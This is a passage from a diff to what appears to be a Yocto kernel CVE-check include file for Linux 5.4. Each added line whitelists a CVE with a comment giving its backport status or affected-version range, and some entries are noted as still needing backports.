+CVE_CHECK_WHITELIST += "CVE-2023-51781"
+
+# cpe-stable-backport: Backported in 5.4.265
+CVE_CHECK_WHITELIST += "CVE-2023-51782"
+
+# fixed-version: only affects 5.9rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-5197"
+
+# cpe-stable-backport: Backported in 5.4.267
+CVE_CHECK_WHITELIST += "CVE-2023-52340"
+
+# CVE-2023-52429 needs backporting (fixed from 6.8rc3)
+
+# fixed-version: only affects 6.5rc6 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-52433"
+
+# CVE-2023-52434 needs backporting (fixed from 6.7rc6)
+
+# cpe-stable-backport: Backported in 5.4.269
+CVE_CHECK_WHITELIST += "CVE-2023-52435"
+
+# cpe-stable-backport: Backported in 5.4.268
+CVE_CHECK_WHITELIST += "CVE-2023-52436"
+
+# cpe-stable-backport: Backported in 5.4.268
+CVE_CHECK_WHITELIST += "CVE-2023-52438"
+
+# cpe-stable-backport: Backported in 5.4.268
+CVE_CHECK_WHITELIST += "CVE-2023-52439"
+
+# fixed-version: only affects 5.17rc4 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-52440"
+
+# fixed-version: only affects 5.15rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-52441"
+
+# CVE-2023-52442 needs backporting (fixed from 6.5rc4)
+
+# cpe-stable-backport: Backported in 5.4.268
+CVE_CHECK_WHITELIST += "CVE-2023-52443"
+
+# cpe-stable-backport: Backported in 5.4.268
+CVE_CHECK_WHITELIST += "CVE-2023-52444"
+
+# cpe-stable-backport: Backported in 5.4.268
+CVE_CHECK_WHITELIST += "CVE-2023-52445"
+
+# fixed-version: only affects 6.2rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-52446"
+
+# fixed-version: only affects 5.9rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-52447"
+
+# cpe-stable-backport: Backported in 5.4.268
+CVE_CHECK_WHITELIST += "CVE-2023-52448"
+
+# cpe-stable-backport: Backported in 5.4.268
+CVE_CHECK_WHITELIST += "CVE-2023-52449"
+
+# fixed-version: only affects 6.2rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-52450"
+
+# cpe-stable-backport: Backported in 5.4.268
+CVE_CHECK_WHITELIST += "CVE-2023-52451"
+
+# fixed-version: only affects 5.12rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-52452"
+
+# fixed-version: only affects 6.2rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-52453"
+
+# cpe-stable-backport: Backported in 5.4.268
+CVE_CHECK_WHITELIST += "CVE-2023-52454"
+
+# fixed-version: only affects 6.3rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-52455"
+
+# fixed-version: only affects 5.9rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-52456"
+
+# fixed-version: only affects 6.1rc6 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-52457"
+
+# CVE-2023-52458 needs backporting (fixed from 6.8rc1)
+
+# fixed-version: only affects 6.6rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-52459"
+
+# fixed-version: only affects 6.7rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-52460"
+
+# fixed-version: only affects 6.7rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-52461"
+
+# fixed-version: only affects 5.16rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-52462"
+
+# fixed-version: only affects 5.8rc7 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-52463"
+
+# cpe-stable-backport: Backported in 5.4.268
+CVE_CHECK_WHITELIST += "CVE-2023-52464"
+
+# fixed-version: only affects 6.5rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-52465"
+
+# fixed-version: only affects 5.9rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-52467"
+
+# fixed-version: only affects 6.4rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-52468"
+
+# cpe-stable-backport: Backported in 5.4.268
+CVE_CHECK_WHITELIST += "CVE-2023-52469"
+
+# cpe-stable-backport: Backported in 5.4.268
+CVE_CHECK_WHITELIST += "CVE-2023-52470"
+
+# fixed-version: only affects 6.7rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-52471"
+
+# fixed-version: only affects 6.5rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-52472"
+
+# fixed-version: only affects 6.4rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-52473"
+
+# CVE-2023-52474 needs backporting (fixed from 6.4rc1)
+
+# cpe-stable-backport: Backported in 5.4.259
+CVE_CHECK_WHITELIST += "CVE-2023-52475"
+
+# CVE-2023-52476 needs backporting (fixed from 6.6rc6)
+
+# cpe-stable-backport: Backported in 5.4.259
+CVE_CHECK_WHITELIST += "CVE-2023-52477"
+
+# cpe-stable-backport: Backported in 5.4.259
+CVE_CHECK_WHITELIST += "CVE-2023-52478"
+
+# CVE-2023-52479 needs backporting (fixed from 6.6rc5)
+
+# CVE-2023-52480 needs backporting (fixed from 6.6rc5)
+
+# CVE-2023-52481 needs backporting (fixed from 6.6rc5)
+
+# CVE-2023-52482 needs backporting (fixed from 6.6rc4)
+
+# fixed-version: only affects 5.15rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-52483"
+
+# CVE-2023-52484 needs backporting (fixed from 6.6rc5)
+
+# CVE-2023-52485 needs backporting (fixed from 6.8rc1)
+
+# cpe-stable-backport: Backported in 5.4.269
+CVE_CHECK_WHITELIST += "CVE-2023-52486"
+
+# fixed-version: only affects 6.5rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-52487"
+
+# CVE-2023-52488 needs backporting (fixed from 6.8rc1)
+
+# CVE-2023-52489 needs backporting (fixed from 6.8rc1)
+
+# fixed-version: only affects 6.3rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-52490"
+
+# CVE-2023-52491 needs backporting (fixed from 6.8rc1)
+
+# fixed-version: only affects 5.6rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-52492"
+
+# fixed-version: only affects 5.7rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-52493"
+
+# fixed-version: only affects 5.13rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-52494"
+
+# fixed-version: only affects 6.3rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-52495"
+
+# CVE-2023-52497 needs backporting (fixed from 6.8rc1)
+
+# CVE-2023-52498 needs backporting (fixed from 6.8rc1)
+
+# fixed-version: only affects 5.12rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-52499"
+
+# CVE-2023-52500 needs backporting (fixed from 6.6rc2)
+
+# CVE-2023-52501 needs backporting (fixed from 6.6rc2)
+
+# cpe-stable-backport: Backported in 5.4.259
+CVE_CHECK_WHITELIST += "CVE-2023-52502"
+
+# fixed-version: only affects 5.6rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-52503"
+
+# cpe-stable-backport: Backported in 5.4.270
+CVE_CHECK_WHITELIST += "CVE-2023-52504"
+
+# fixed-version: only affects 5.18rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-52505"
+
+# CVE-2023-52506 needs backporting (fixed from 6.6rc3)
+
+# cpe-stable-backport: Backported in 5.4.259
+CVE_CHECK_WHITELIST += "CVE-2023-52507"
+
+# CVE-2023-52508 needs backporting (fixed from 6.6rc2)
+
+# cpe-stable-backport: Backported in 5.4.259
+CVE_CHECK_WHITELIST += "CVE-2023-52509"
+
+# cpe-stable-backport: Backported in 5.4.259
+CVE_CHECK_WHITELIST += "CVE-2023-52510"
+
+# CVE-2023-52511 needs backporting (fixed from 6.6rc1)
+
+# fixed-version: only affects 5.18rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-52512"
+
+# cpe-stable-backport: Backported in 5.4.258
+CVE_CHECK_WHITELIST += "CVE-2023-52513"
+
+# CVE-2023-52515 needs backporting (fixed from 6.6rc5)
+
+# CVE-2023-52516 needs backporting (fixed from 6.6rc1)
+
+# CVE-2023-52517 needs backporting (fixed from 6.6rc1)
+
+# fixed-version: only affects 5.16rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-52518"
+
+# CVE-2023-52519 needs backporting (fixed from 6.6rc5)
+
+# fixed-version: only affects 5.14rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-52520"
+
+# cpe-stable-backport: Backported in 5.4.258
+CVE_CHECK_WHITELIST += "CVE-2023-52522"
+
+# fixed-version: only affects 5.13rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-52523"
+
+# fixed-version: only affects 6.5rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-52524"
+
+# fixed-version: only affects 6.6rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-52525"
+
+# fixed-version: only affects 6.1rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-52526"
+
+# cpe-stable-backport: Backported in 5.4.258
+CVE_CHECK_WHITELIST += "CVE-2023-52527"
+
+# cpe-stable-backport: Backported in 5.4.258
+CVE_CHECK_WHITELIST += "CVE-2023-52528"
+
+# fixed-version: only affects 5.14rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-52529"
+
+# CVE-2023-52530 needs backporting (fixed from 6.6rc5)
+
+# CVE-2023-52531 needs backporting (fixed from 6.6rc5)
+
+# CVE-2023-52532 needs backporting (fixed from 6.6rc5)
+
+# CVE-2023-52559 needs backporting (fixed from 6.6rc5)
+
+# fixed-version: only affects 5.16rc5 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-52560"
+
+# CVE-2023-52561 needs backporting (fixed from 6.6rc1)
+
+# fixed-version: only affects 6.0rc4 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-52562"
+
+# CVE-2023-52563 needs backporting (fixed from 6.6rc3)
+
+# fixed-version: only affects 6.5rc4 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-52564"
+
+# CVE-2023-52565 needs backporting (fixed from 6.6rc3)
+
+# cpe-stable-backport: Backported in 5.4.258
+CVE_CHECK_WHITELIST += "CVE-2023-52566"
+
+# fixed-version: only affects 6.4rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-52567"
+
+# CVE-2023-52568 needs backporting (fixed from 6.6rc4)
+
+# CVE-2023-52569 needs backporting (fixed from 6.6rc2)
+
+# fixed-version: only affects 6.1rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-52570"
+
+# CVE-2023-52571 needs backporting (fixed from 6.6rc4)
+
+# CVE-2023-52572 needs backporting (fixed from 6.6rc3)
+
+# cpe-stable-backport: Backported in 5.4.258
+CVE_CHECK_WHITELIST += "CVE-2023-52573"
+
+# cpe-stable-backport: Backported in 5.4.258
+CVE_CHECK_WHITELIST += "CVE-2023-52574"
+
+# fixed-version: only affects 6.5rc6 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-52575"
+
+# fixed-version: only affects 5.13rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-52576"
+
+# fixed-version: only affects 6.6rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-52577"
+
+# cpe-stable-backport: Backported in 5.4.258
+CVE_CHECK_WHITELIST += "CVE-2023-52578"
+
+# fixed-version: only affects 5.12rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-52580"
+
+# fixed-version: only affects 6.5rc6 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-52581"
+
+# fixed-version: only affects 5.13rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-52582"
+
+# cpe-stable-backport: Backported in 5.4.269
+CVE_CHECK_WHITELIST += "CVE-2023-52583"
+
+# CVE-2023-52584 needs backporting (fixed from 6.8rc1)
+
+# CVE-2023-52585 needs backporting (fixed from 6.8rc1)
+
+# CVE-2023-52586 needs backporting (fixed from 6.8rc1)
+
+# cpe-stable-backport: Backported in 5.4.269
+CVE_CHECK_WHITELIST += "CVE-2023-52587"
+
+# CVE-2023-52588 needs backporting (fixed from 6.8rc1)
+
+# CVE-2023-52589 needs backporting (fixed from 6.8rc1)
+
+# CVE-2023-52590 needs backporting (fixed from 6.8rc1)
+
+# CVE-2023-52591 needs backporting (fixed from 6.8rc1)
+
+# CVE-2023-52593 needs backporting (fixed from 6.8rc1)
+
+# cpe-stable-backport: Backported in 5.4.269
+CVE_CHECK_WHITELIST += "CVE-2023-52594"
+
+# cpe-stable-backport: Backported in 5.4.269
+CVE_CHECK_WHITELIST += "CVE-2023-52595"
+
+# CVE-2023-52596 needs backporting (fixed from 6.8rc1)
+
+# cpe-stable-backport: Backported in 5.4.269
+CVE_CHECK_WHITELIST += "CVE-2023-52597"
+
+# cpe-stable-backport: Backported in 5.4.269
+CVE_CHECK_WHITELIST += "CVE-2023-52598"
+
+# cpe-stable-backport: Backported in 5.4.269
+CVE_CHECK_WHITELIST += "CVE-2023-52599"
+
+# cpe-stable-backport: Backported in 5.4.269
+CVE_CHECK_WHITELIST += "CVE-2023-52600"
+
+# cpe-stable-backport: Backported in 5.4.269
+CVE_CHECK_WHITELIST += "CVE-2023-52601"
+
+# cpe-stable-backport: Backported in 5.4.269
+CVE_CHECK_WHITELIST += "CVE-2023-52602"
+
+# cpe-stable-backport: Backported in 5.4.269
+CVE_CHECK_WHITELIST += "CVE-2023-52603"
+
+# cpe-stable-backport: Backported in 5.4.269
+CVE_CHECK_WHITELIST += "CVE-2023-52604"
+
+# cpe-stable-backport: Backported in 5.4.269
+CVE_CHECK_WHITELIST += "CVE-2023-52606"
+
+# cpe-stable-backport: Backported in 5.4.269
+CVE_CHECK_WHITELIST += "CVE-2023-52607"
+
+# fixed-version: only affects 5.7rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-52608"
+
+# cpe-stable-backport: Backported in 5.4.268
+CVE_CHECK_WHITELIST += "CVE-2023-52609"
+
+# CVE-2023-52610 needs backporting (fixed from 6.8rc1)
+
+# fixed-version: only affects 6.4rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-52611"
+
+# cpe-stable-backport: Backported in 5.4.268
+CVE_CHECK_WHITELIST += "CVE-2023-52612"
+
+# fixed-version: only affects 6.6rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-52613"
+
+# CVE-2023-52614 needs backporting (fixed from 6.8rc1)
+
+# cpe-stable-backport: Backported in 5.4.269
+CVE_CHECK_WHITELIST += "CVE-2023-52615"
+
+# fixed-version: only affects 5.10rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-52616"
+
+# cpe-stable-backport: Backported in 5.4.269
+CVE_CHECK_WHITELIST += "CVE-2023-52617"
+
+# CVE-2023-52618 needs backporting (fixed from 6.8rc1)
+
+# cpe-stable-backport: Backported in 5.4.269
+CVE_CHECK_WHITELIST += "CVE-2023-52619"
+
+# CVE-2023-52620 needs backporting (fixed from 6.4)
+
+# CVE-2023-52621 needs backporting (fixed from 6.8rc1)
+
+# cpe-stable-backport: Backported in 5.4.269
+CVE_CHECK_WHITELIST += "CVE-2023-52622"
+
+# cpe-stable-backport: Backported in 5.4.269
+CVE_CHECK_WHITELIST += "CVE-2023-52623"
+
+# CVE-2023-52624 needs backporting (fixed from 6.8rc1)
+
+# CVE-2023-52625 needs backporting (fixed from 6.8rc1)
+
+# fixed-version: only affects 6.7rc2 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-52626"
+
+# fixed-version: only affects 5.6rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-52627"
+
+# CVE-2023-52628 needs backporting (fixed from 6.6rc1)
+
+# CVE-2023-52629 needs backporting (fixed from 6.6rc1)
+
+# fixed-version: only affects 5.10rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-52630"
+
+# fixed-version: only affects 5.15rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-52631"
+
+# CVE-2023-52632 needs backporting (fixed from 6.8rc1)
+
+# CVE-2023-52633 needs backporting (fixed from 6.8rc1)
+
+# CVE-2023-52634 needs backporting (fixed from 6.8rc1)
+
+# CVE-2023-52635 needs backporting (fixed from 6.8rc1)
+
+# fixed-version: only affects 6.6rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-52636"
+
+# cpe-stable-backport: Backported in 5.4.269
+CVE_CHECK_WHITELIST += "CVE-2023-52637"
+
+# CVE-2023-52638 needs backporting (fixed from 6.8rc5)
+
+# CVE-2023-52639 needs backporting (fixed from 6.8rc4)
+
+# CVE-2023-52640 needs backporting (fixed from 6.8rc4)
+
+# CVE-2023-52641 needs backporting (fixed from 6.8rc4)
+
+# fixed-version: only affects 6.1rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-5345"
+
+# fixed-version: only affects 6.2 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-5633"
+
+# cpe-stable-backport: Backported in 5.4.259
+CVE_CHECK_WHITELIST += "CVE-2023-5717"
+
+# fixed-version: only affects 6.2rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-5972"
+
+# fixed-version: only affects 5.15rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-6039"
+
+# cpe-stable-backport: Backported in 5.4.267
+CVE_CHECK_WHITELIST += "CVE-2023-6040"
+
+# fixed-version: only affects 6.6rc3 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-6111"
+
+# cpe-stable-backport: Backported in 5.4.263
+CVE_CHECK_WHITELIST += "CVE-2023-6121"
+
+# fixed-version: only affects 5.7rc7 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-6176"
+
+# fixed-version: only affects 6.6rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-6200"
+
+# CVE-2023-6238 has no known resolution
+
+# CVE-2023-6240 has no known resolution
+
+# cpe-stable-backport: Backported in 5.4.273
+CVE_CHECK_WHITELIST += "CVE-2023-6270"
+
+# cpe-stable-backport: Backported in 5.4.268
+CVE_CHECK_WHITELIST += "CVE-2023-6356"
+
+# fixed-version: only affects 6.1rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-6531"
+
+# CVE-2023-6535 has no known resolution
+
+# cpe-stable-backport: Backported in 5.4.268
+CVE_CHECK_WHITELIST += "CVE-2023-6536"
+
+# CVE-2023-6546 needs backporting (fixed from 6.5rc7)
+
+# CVE-2023-6560 needs backporting (fixed from 6.7rc4)
+
+# cpe-stable-backport: Backported in 5.4.266
+CVE_CHECK_WHITELIST += "CVE-2023-6606"
+
+# CVE-2023-6610 needs backporting (fixed from 6.7rc7)
+
+# fixed-version: only affects 5.11rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-6622"
+
+# fixed-version: only affects 6.7rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-6679"
+
+# fixed-version: only affects 5.6rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-6817"
+
+# cpe-stable-backport: Backported in 5.4.268
+CVE_CHECK_WHITELIST += "CVE-2023-6915"
+
+# cpe-stable-backport: Backported in 5.4.264
+CVE_CHECK_WHITELIST += "CVE-2023-6931"
+
+# cpe-stable-backport: Backported in 5.4.263
+CVE_CHECK_WHITELIST += "CVE-2023-6932"
+
+# cpe-stable-backport: Backported in 5.4.273
+CVE_CHECK_WHITELIST += "CVE-2023-7042"
+
+# cpe-stable-backport: Backported in 5.4.235
+CVE_CHECK_WHITELIST += "CVE-2023-7192"
+
+# fixed-version: only affects 6.5rc6 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-0193"
+
+# cpe-stable-backport: Backported in 5.4.269
+CVE_CHECK_WHITELIST += "CVE-2024-0340"
+
+# fixed-version: only affects 6.2rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-0443"
+
+# fixed-version: only affects 5.15rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-0562"
+
+# CVE-2024-0564 has no known resolution
+
+# CVE-2024-0565 needs backporting (fixed from 6.7rc6)
+
+# fixed-version: only affects 6.4rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-0582"
+
+# cpe-stable-backport: Backported in 5.4.263
+CVE_CHECK_WHITELIST += "CVE-2024-0584"
+
+# cpe-stable-backport: Backported in 5.4.269
+CVE_CHECK_WHITELIST += "CVE-2024-0607"
+
+# fixed-version: only affects 5.13rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-0639"
+
+# fixed-version: only affects 5.5rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-0641"
+
+# cpe-stable-backport: Backported in 5.4.267
+CVE_CHECK_WHITELIST += "CVE-2024-0646"
+
+# cpe-stable-backport: Backported in 5.4.243
+CVE_CHECK_WHITELIST += "CVE-2024-0775"
+
+# cpe-stable-backport: Backported in 5.4.271
+CVE_CHECK_WHITELIST += "CVE-2024-0841"
+
+# fixed-version: only affects 5.13rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-1085"
+
+# cpe-stable-backport: Backported in 5.4.269
+CVE_CHECK_WHITELIST += "CVE-2024-1086"
+
+# CVE-2024-1151 needs backporting (fixed from 6.8rc5)
+
+# CVE-2024-1312 needs backporting (fixed from 6.5rc4)
+
+# CVE-2024-21803 has no known resolution
+
+# CVE-2024-2193 has no known resolution
+
+# cpe-stable-backport: Backported in 5.4.273
+CVE_CHECK_WHITELIST += "CVE-2024-22099"
+
+# CVE-2024-22386 has no known resolution
+
+# fixed-version: only affects 5.15rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-22705"
+
+# cpe-stable-backport: Backported in 5.4.255
+CVE_CHECK_WHITELIST += "CVE-2024-23196"
+
+# CVE-2024-23307 needs backporting (fixed from 6.9rc1)
+
+# CVE-2024-23848 has no known resolution
+
+# cpe-stable-backport: Backported in 5.4.269
+CVE_CHECK_WHITELIST += "CVE-2024-23849"
+
+# fixed-version: only affects 5.9rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-23850"
+
+# CVE-2024-23851 needs backporting (fixed from 6.8rc3)
+
+# CVE-2024-24855 needs backporting (fixed from 6.5rc2)
+
+# CVE-2024-24857 has no known resolution
+
+# CVE-2024-24858 has no known resolution
+
+# CVE-2024-24859 has no known resolution
+
+# CVE-2024-24860 needs backporting (fixed from 6.8rc1)
+
+# CVE-2024-24861 needs backporting (fixed from 6.9rc1)
+
+# CVE-2024-24864 has no known resolution
+
+# CVE-2024-25739 has no known resolution
+
+# CVE-2024-25740 has no known resolution
+
+# CVE-2024-25741 has no known resolution
+
+# CVE-2024-25744 needs backporting (fixed from 6.7rc5)
+
+# fixed-version: only affects 6.5rc4 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26581"
+
+# fixed-version: only affects 6.0rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26582"
+
+# fixed-version: only affects 5.7 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26583"
+
+# CVE-2024-26584 needs backporting (fixed from 6.8rc5)
+
+# CVE-2024-26585 needs backporting (fixed from 6.8rc5)
+
+# CVE-2024-26586 needs backporting (fixed from 6.8rc1)
+
+# fixed-version: only affects 6.6rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26587"
+
+# fixed-version: only affects 6.1rc3 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26588"
+
+# CVE-2024-26589 needs backporting (fixed from 6.8rc1)
+
+# fixed-version: only affects 5.16rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26590"
+
+# fixed-version: only affects 5.13rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26591"
+
+# CVE-2024-26592 needs backporting (fixed from 6.8rc1)
+
+# cpe-stable-backport: Backported in 5.4.269
+CVE_CHECK_WHITELIST += "CVE-2024-26593"
+
+# CVE-2024-26594 needs backporting (fixed from 6.8rc1)
+
+# CVE-2024-26595 needs backporting (fixed from 6.8rc1)
+
+# fixed-version: only affects 6.1rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26596"
+
+# cpe-stable-backport: Backported in 5.4.268
+CVE_CHECK_WHITELIST += "CVE-2024-26597"
+
+# cpe-stable-backport: Backported in 5.4.269
+CVE_CHECK_WHITELIST += "CVE-2024-26598"
+
+# fixed-version: only affects 5.17rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26599"
+
+# cpe-stable-backport: Backported in 5.4.269
+CVE_CHECK_WHITELIST += "CVE-2024-26600"
+
+# fixed-version: only affects 5.11rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26601"
+
+# cpe-stable-backport: Backported in 5.4.269
+CVE_CHECK_WHITELIST += "CVE-2024-26602"
+
+# fixed-version: only affects 5.14rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26603"
+
+# fixed-version: only affects 6.6rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26604"
+
+# fixed-version: only affects 6.7 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26605"
+
+# cpe-stable-backport: Backported in 5.4.269
+CVE_CHECK_WHITELIST += "CVE-2024-26606"
+
+# CVE-2024-26607 needs backporting (fixed from 6.8rc2)
+
+# fixed-version: only affects 5.15rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26608"
+
+# fixed-version: only affects 5.5rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26610"
+
+# fixed-version: only affects 6.6rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26611"
+
+# fixed-version: only affects 5.17rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26612"
+
+# CVE-2024-26614 needs backporting (fixed from 6.8rc2)
+
+# cpe-stable-backport: Backported in 5.4.269
+CVE_CHECK_WHITELIST += "CVE-2024-26615"
+
+# fixed-version: only affects 6.4rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26616"
+
+# fixed-version: only affects 6.7rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26617"
+
+# fixed-version: only affects 6.5rc7 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26618"
+
+# fixed-version: only affects 6.7rc5 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26619"
+
+# fixed-version: only affects 6.0rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26620"
+
+# fixed-version: only affects 6.7 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26621"
+
+# CVE-2024-26622 needs backporting (fixed from 6.8rc7)
+
+# CVE-2024-26623 needs backporting (fixed from 6.8rc3)
+
+# cpe-stable-backport: Backported in 5.4.269
+CVE_CHECK_WHITELIST += "CVE-2024-26625"
+
+# fixed-version: only affects 6.8rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26626"
+
+# CVE-2024-26627 needs backporting (fixed from 6.8rc3)
+
+# fixed-version: only affects 5.19rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26629"
+
+# fixed-version: only affects 6.5rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26630"
+
+# fixed-version: only affects 5.13rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26631"
+
+# fixed-version: only affects 5.17rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26632"
+
+# cpe-stable-backport: Backported in 5.4.268
+CVE_CHECK_WHITELIST += "CVE-2024-26633"
+
+# fixed-version: only affects 6.6rc7 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26634"
+
+# cpe-stable-backport: Backported in 5.4.269
+CVE_CHECK_WHITELIST += "CVE-2024-26635"
+
+# cpe-stable-backport: Backported in 5.4.269
+CVE_CHECK_WHITELIST += "CVE-2024-26636"
+
+# fixed-version: only affects 6.7 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26637"
+
+# fixed-version: only affects 5.19rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26638"
+
+# fixed-version: only affects 6.8rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26639"
+
+# CVE-2024-26640 needs backporting (fixed from 6.8rc3)
+
+# CVE-2024-26641 needs backporting (fixed from 6.8rc3)
+
+# CVE-2024-26642 needs backporting (fixed from 6.8)
+
+# fixed-version: only affects 6.5rc6 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26643"
+
+# CVE-2024-26644 needs backporting (fixed from 6.8rc2)
+
+# cpe-stable-backport: Backported in 5.4.269
+CVE_CHECK_WHITELIST += "CVE-2024-26645"
+
+# CVE-2024-26646 needs backporting (fixed from 6.8rc1)
+
+# CVE-2024-26647 needs backporting (fixed from 6.8rc1)
+
+# CVE-2024-26648 needs backporting (fixed from 6.8rc1)
+
+# fixed-version: only affects 6.3rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26649"
+
+# CVE-2024-26650 needs backporting (fixed from 6.8rc2)
+
+# cpe-stable-backport: Backported in 5.4.273
+CVE_CHECK_WHITELIST += "CVE-2024-26651"
+
+# fixed-version: only affects 6.4rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26652"
+
+# fixed-version: only affects 6.7rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26653"
+
+# CVE-2024-26654 needs backporting (fixed from 6.9rc2)
+
+# CVE-2024-26655 needs backporting (fixed from 6.9rc2)
+
+# CVE-2024-26656 needs backporting (fixed from 6.9rc1)
+
+# fixed-version: only affects 6.7rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26657"
+
+# CVE-2024-26658 needs backporting (fixed from 6.8rc1)
+
+# CVE-2024-26659 needs backporting (fixed from 6.8rc3)
+
+# fixed-version: only affects 5.11rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26660"
+
+# fixed-version: only affects 5.9rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26661"
+
+# fixed-version: only affects 5.9rc1 onwards
